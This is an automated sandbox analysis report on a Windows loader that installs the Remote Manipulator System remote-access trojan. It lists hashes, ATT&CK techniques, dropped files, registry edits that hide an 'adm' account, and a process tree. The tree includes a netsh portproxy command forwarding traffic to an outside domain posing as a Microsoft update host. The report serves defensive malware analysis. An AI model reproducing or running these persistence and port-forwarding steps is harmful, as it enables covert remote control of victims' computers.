rms | 3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

Analysis

max time kernel
149s
max time network
154s
platform
windows10_x64
resource
win10-en-20211208
submitted
28-12-2021 11:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp/57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
Size

397KB
MD5

aff57ee1a4f3731c2036046910f78fb4
SHA1

ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256

3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512

5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Score

10^/10

rms discovery evasion persistence rat trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

Blocklisted process makes network request 2 IoCs

flow	pid	Process
41	3620	msiexec.exe
43	3620	msiexec.exe

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
508	RMS.exe
404	installer.exe
3952	rutserv.exe
2312	rutserv.exe
3088	rutserv.exe
3388	rutserv.exe
3848	rfusclient.exe
2008	rfusclient.exe
1516	rfusclient.exe

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
1780	MsiExec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Program Files directory 53 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmspm.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\ntprint.inf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\srvinst.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.hlp	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\stdnames_vpd.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\progress.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui2.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.hlp	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\English.lg	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\uninstall.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\progress.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\VPDAgent_x64.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmspm.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\ntprint.inf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\install.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms_s.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.ini	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\uninstall.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\fwproc.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rms.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\VPDAgent.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms_s.lng	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.ini	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\fwproc.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\stdnames_vpd.gpd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\install.cmd	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\srvinst_x64.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui2.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe	msiexec.exe
File created	C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\SampleClient.exe	msiexec.exe

Drops file in Windows directory 21 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f76bb6f.msi	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe	msiexec.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
File created	C:\Windows\Installer\f76bb6c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f76bb6c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC09D.tmp	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\SourceHash{D9E14363-FD66-419D-9DC9-C62471755C9F}	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe	msiexec.exe
File created	C:\Windows\SoftwareDistribution\config.xml	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
File opened for modification	C:\Windows\Installer\MSIBDCE.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1956	NETSTAT.EXE
1708	NETSTAT.EXE
1944	NETSTAT.EXE

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rutserv.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rutserv.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\1 = "DISK1;1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Language = "1049"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9\RMS	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\PackageCode = "EE22CCA5812A64F4CB23B29D2A4A798E"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductIcon = "C:\\Windows\\Installer\\{D9E14363-FD66-419D-9DC9-C62471755C9F}\\ARPPRODUCTICON.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\PackageName = "rms.host6.3ru_mod.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductName = "Remote Manipulator System - Host"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Version = "115998720"	msiexec.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
404	installer.exe
404	installer.exe
404	installer.exe
404	installer.exe
404	installer.exe
404	installer.exe
404	installer.exe
404	installer.exe
404	installer.exe
404	installer.exe
3620	msiexec.exe
3620	msiexec.exe
3952	rutserv.exe
3952	rutserv.exe
3952	rutserv.exe
3952	rutserv.exe
3952	rutserv.exe
3952	rutserv.exe
2312	rutserv.exe
2312	rutserv.exe
3088	rutserv.exe
3088	rutserv.exe
3388	rutserv.exe
3388	rutserv.exe
3388	rutserv.exe
3388	rutserv.exe
3388	rutserv.exe
3388	rutserv.exe
2008	rfusclient.exe
2008	rfusclient.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1516	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
Token: SeSecurityPrivilege	1040	msiexec.exe
Token: SeDebugPrivilege	1708	NETSTAT.EXE
Token: SeDebugPrivilege	1944	NETSTAT.EXE
Token: SeDebugPrivilege	1956	NETSTAT.EXE
Token: SeShutdownPrivilege	1244	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1244	msiexec.exe
Token: SeSecurityPrivilege	3620	msiexec.exe
Token: SeCreateTokenPrivilege	1244	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1244	msiexec.exe
Token: SeLockMemoryPrivilege	1244	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1244	msiexec.exe
Token: SeMachineAccountPrivilege	1244	msiexec.exe
Token: SeTcbPrivilege	1244	msiexec.exe
Token: SeSecurityPrivilege	1244	msiexec.exe
Token: SeTakeOwnershipPrivilege	1244	msiexec.exe
Token: SeLoadDriverPrivilege	1244	msiexec.exe
Token: SeSystemProfilePrivilege	1244	msiexec.exe
Token: SeSystemtimePrivilege	1244	msiexec.exe
Token: SeProfSingleProcessPrivilege	1244	msiexec.exe
Token: SeIncBasePriorityPrivilege	1244	msiexec.exe
Token: SeCreatePagefilePrivilege	1244	msiexec.exe
Token: SeCreatePermanentPrivilege	1244	msiexec.exe
Token: SeBackupPrivilege	1244	msiexec.exe
Token: SeRestorePrivilege	1244	msiexec.exe
Token: SeShutdownPrivilege	1244	msiexec.exe
Token: SeDebugPrivilege	1244	msiexec.exe
Token: SeAuditPrivilege	1244	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1244	msiexec.exe
Token: SeChangeNotifyPrivilege	1244	msiexec.exe
Token: SeRemoteShutdownPrivilege	1244	msiexec.exe
Token: SeUndockPrivilege	1244	msiexec.exe
Token: SeSyncAgentPrivilege	1244	msiexec.exe
Token: SeEnableDelegationPrivilege	1244	msiexec.exe
Token: SeManageVolumePrivilege	1244	msiexec.exe
Token: SeImpersonatePrivilege	1244	msiexec.exe
Token: SeCreateGlobalPrivilege	1244	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe
Token: SeTakeOwnershipPrivilege	3620	msiexec.exe
Token: SeRestorePrivilege	3620	msiexec.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
404	installer.exe
3952	rutserv.exe
2312	rutserv.exe
3088	rutserv.exe
3388	rutserv.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 656	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	68
PID 2936 wrote to memory of 656	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	68
PID 656 wrote to memory of 1056	656	csc.exe	70
PID 656 wrote to memory of 1056	656	csc.exe	70
PID 2936 wrote to memory of 3200	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	72
PID 2936 wrote to memory of 3200	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	72
PID 2936 wrote to memory of 3336	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	76
PID 2936 wrote to memory of 3336	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	76
PID 2936 wrote to memory of 1708	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	77
PID 2936 wrote to memory of 1708	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	77
PID 2936 wrote to memory of 1944	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	78
PID 2936 wrote to memory of 1944	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	78
PID 2936 wrote to memory of 1956	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	79
PID 2936 wrote to memory of 1956	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	79
PID 2936 wrote to memory of 2384	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	81
PID 2936 wrote to memory of 2384	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	81
PID 2936 wrote to memory of 3044	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	82
PID 2936 wrote to memory of 3044	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	82
PID 2936 wrote to memory of 3188	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	83
PID 2936 wrote to memory of 3188	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	83
PID 2936 wrote to memory of 1404	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	84
PID 2936 wrote to memory of 1404	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	84
PID 2936 wrote to memory of 1936	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	85
PID 2936 wrote to memory of 1936	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	85
PID 2936 wrote to memory of 508	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	87
PID 2936 wrote to memory of 508	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	87
PID 2936 wrote to memory of 508	2936	57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe	87
PID 508 wrote to memory of 404	508	RMS.exe	88
PID 508 wrote to memory of 404	508	RMS.exe	88
PID 508 wrote to memory of 404	508	RMS.exe	88
PID 404 wrote to memory of 1244	404	installer.exe	89
PID 404 wrote to memory of 1244	404	installer.exe	89
PID 404 wrote to memory of 1244	404	installer.exe	89
PID 3620 wrote to memory of 1780	3620	msiexec.exe	91
PID 3620 wrote to memory of 1780	3620	msiexec.exe	91
PID 3620 wrote to memory of 1780	3620	msiexec.exe	91
PID 3620 wrote to memory of 3952	3620	msiexec.exe	92
PID 3620 wrote to memory of 3952	3620	msiexec.exe	92
PID 3620 wrote to memory of 3952	3620	msiexec.exe	92
PID 3620 wrote to memory of 2312	3620	msiexec.exe	93
PID 3620 wrote to memory of 2312	3620	msiexec.exe	93
PID 3620 wrote to memory of 2312	3620	msiexec.exe	93
PID 3620 wrote to memory of 3088	3620	msiexec.exe	94
PID 3620 wrote to memory of 3088	3620	msiexec.exe	94
PID 3620 wrote to memory of 3088	3620	msiexec.exe	94
PID 404 wrote to memory of 3680	404	installer.exe	96
PID 404 wrote to memory of 3680	404	installer.exe	96
PID 404 wrote to memory of 3680	404	installer.exe	96
PID 3388 wrote to memory of 2008	3388	rutserv.exe	99
PID 3388 wrote to memory of 2008	3388	rutserv.exe	99
PID 3388 wrote to memory of 2008	3388	rutserv.exe	99
PID 3388 wrote to memory of 3848	3388	rutserv.exe	98
PID 3388 wrote to memory of 3848	3388	rutserv.exe	98
PID 3388 wrote to memory of 3848	3388	rutserv.exe	98
PID 2008 wrote to memory of 1516	2008	rfusclient.exe	104
PID 2008 wrote to memory of 1516	2008	rfusclient.exe	104
PID 2008 wrote to memory of 1516	2008	rfusclient.exe	104

C:\Users\Admin\AppData\Local\Temp\tmp\57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\tmp\57dd4b2b-14e1-4203-b0c1-d9b39a7bab64_$77_loader.exe"
1⤵
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5yzhjabv.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:656
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB70D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB70C.tmp"
    3⤵
    PID:1056
- C:\Windows\system32\chcp.com
  "C:\Windows\system32\chcp.com" 437
  2⤵
  PID:3200
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:3336
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1708
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy reset
  2⤵
  PID:2384
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:3044
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
  2⤵
  PID:3188
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1404
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:1936
- C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe
